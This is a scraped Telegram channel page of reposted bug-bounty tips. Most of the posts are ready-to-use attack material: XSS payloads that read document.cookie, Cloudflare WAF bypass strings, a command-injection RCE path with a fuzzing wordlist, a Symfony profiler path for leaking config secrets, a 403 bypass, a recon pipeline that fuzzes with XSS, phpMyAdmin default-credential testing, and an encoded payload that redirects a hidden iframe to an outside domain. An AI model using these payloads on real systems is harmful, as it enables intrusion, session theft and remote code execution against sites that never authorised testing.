Termux All Command [Telegram Group]
Kanalga Telegramโda oโtish
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Ko'proq ko'rsatish1 185
Obunachilar
+124 soatlar
+157 kunlar
+4830 kunlar
Postlar arxiv
My four XSS vulnerability reports were triaged.
I reported them to a single program on HackerOne.
Tips:
* if you were able to find a vulnerable parameter try to dork for it in a different assets, google dorks used:
site:*.target.com inurl:"?name="and site:*.target.com inurl:"?type="
* If you come across a sub-domain that says "You do not have permission to view this directory or page":
https://sub.target[.]com/ --> 403 (Forbidden)
https://sub.target[.]com/%3f/ --> 200 (OK)
Payload Used: </div><img src="x" onerror="alert(document.cookie)"/><div><p>Top technical skills for penetration tester specialists
โ Nmap
โ Kali Linux
โ BackTrack
โ SamuraiWTF
โ Parrot
โ Metasploit
โ Kismet
โ THC Hydra
โ soapUI
โ AppScan
โ ZAP
โ SOOS
โ Canvas
โ QualysGuard
โ ArcSight
โ Splunk
โ Archer
โ Nessus
โ Nmap
โ Nikto
โ Wireshark
โ WebInspect
โ Netsparker
โ Fortify
โ Ounce Labs
โ Acunetix
โ SQLmap
โ SAST
โ DAST
โ Social-Engineer Toolkit
โ Objective-C
โ Java
โ C#
โ C
โ C++
โ Python
โ SQL
โ ASP.NET
โ PHP
โ JavaScript
โ Bash
โ Ruby
โ REST
โ Powershell
โ XML
โ YAML
โ JSON
โ Protocols: FTP/POP3/IMAP/SMB/SSH
โ TCP/IP
โ Windows/iOS/Android/Linux/Unix
โ Firewalls
โ Networks
โ Servers
โ Cloud Infrastructures
โ CI/CD
โ Keyloggers
โ Cryptography
โ IDS/IPS
โ Technical writing
โ Hardware
โ OSI layer model
connect for more post- https://linktr.ee/Harshleen_Chawla
CloudFlare XSS protection WAF Bypassed !
payload used:
<Img Src=OnXSS OnError=confirm(document.cookie)>
#bugbounty #infosec
๐ Bug Bounty Tip: ๐ต๏ธโโ๏ธ
If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data. Enjoy! ๐
#bugbountytips #bugbountytip #cybersecurity #ethicalhacking
๐ค Practical Ethical Hacking From Beginner To Advance Course โก๏ธ
โโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ A Complete FREE Course
โ๏ธ DOWNLOAD LINK : https://drive.google.com/drive/mobile/folders/1if6MCeBCj8sxWwJIKhtgwU0GBuBW8uLx
โโโโโโโโโโโโโโโโโโโโโโโโโ
โก๏ธ ๐๐ข๐ฏ๐ ๐๐๐๐๐ญ๐ข๐จ๐ง๐ฌ ๐๐ง ๐๐ฏ๐๐ซ๐ฒ ๐๐จ๐ฌ๐ญ ๐ฉ
โโโโโโโโโโโโโโโโโโโโโโโโโ
๐ Share Us For More -
Online tools for automating work with dorks (Google and beyond):
๐
dorki.io
๐
https://lnkd.in/ghpygKqw
๐
dorksearch.com
๐
dorkme.com
๐
dorkgenius.com
๐
dorks.faisalahmed.me
hashtag#bugbounty hashtag#bugbountytips
Access OpenAI ChatGPT4o for free!
Thanks me later ๐
Just translate the language from hashtag#Korean to hashtag#English
Here's the website link :- https://wrtn.ai/
Join the community of warriorโs :- https://lnkd.in/eurggv4a
Hii Bug hunters
I submitted 3x XSS
One in Referer
Tips :
1) Subfinder -d target.com -all -o subdomains.txt
2) cat subdomains.txt | httprobe | tee -a host.txt
3) cat host.txt | hakrawler | tee -a endpoint.txt
cat host.txt | waybackurls | tee -a endpoint.txt
4) cat endpoint.txt | qsreplace %27"></a><โ/script></title></form></span><โ/meta><โ/style></iframe></noscript></textarea></xmp></pre><โScRiPt>alert(/Hacked%20by%20ahmad/)<โ/sCrIpT> | tee -a xss_fuzz.txt
5) cat xss_fuzz.txt | freq | tee -a possible_xss.txt
Make sure you have disabled account registration on your WordPress site's '/๐ฐ๐ฉ-๐ฅ๐จ๐ ๐ข๐ง.๐ฉ๐ก๐ฉ?๐๐๐ญ๐ข๐จ๐ง=๐ซ๐๐ ๐ข๐ฌ๐ญ๐๐ซ' ๐ฉ๐๐ ๐.
This vulnerability allows threat actors to register an account, potentially ๐ ๐ซ๐๐ง๐ญ๐ข๐ง๐ ๐ญ๐ก๐๐ฆ ๐๐๐ฆ๐ข๐ง๐ข๐ฌ๐ญ๐ซ๐๐ญ๐ข๐ฏ๐ ๐ฉ๐ซ๐ข๐ฏ๐ข๐ฅ๐๐ ๐๐ฌ and enabling them to ๐ฎ๐ฉ๐ฅ๐จ๐๐ ๐ฌ๐ก๐๐ฅ๐ฅ๐ฌ.
I've tested this vulnerability ( reported by @x0xr2r ) , and it appears to be exploitable on some sites. However, a fix is available, so patching your site is crucial. A ๐๐จ๐จ๐ ๐ฅ๐ search suggests there are still many vulnerable sites.
๐จ XSS Hunting from WaybackURLS ๐
Payload :
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : gudetama_bf
#bugbountytips #bugbounty
Story of very quick RCE ๐
โข Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can to add this paths for ur wordlist
โข cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
โข cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
โข cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips โค๏ธ
Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. ๐๐ช
Payload: โ๏ธ
"%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e"
#bugbountytips #infosec
Bug: Cross Site Scripting
Organization: HP
Tip: ><โscript>alert(document.domain)<โ/script> โ
"})";alert(document.domain)// โ๏ธ
"}); closes an existing JavaScript function or HTML attribute.
// used to comment out the rest of the code to prevent syntax errors
How i am hunting for phpmyadmin logins:-
nuclei -l live-subs.txt -t nuclei-templates/http/exposed-panels/phpmyadmin-panel.yaml
## Then :-
- Test for default creds : root & password,..etc
- Fuzzing
- Test SQLi
- Response Manipulation
encoded xss payload : %3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
Endi mavjud! Telegram Tadqiqoti 2025 โ yilning asosiy insaytlari 
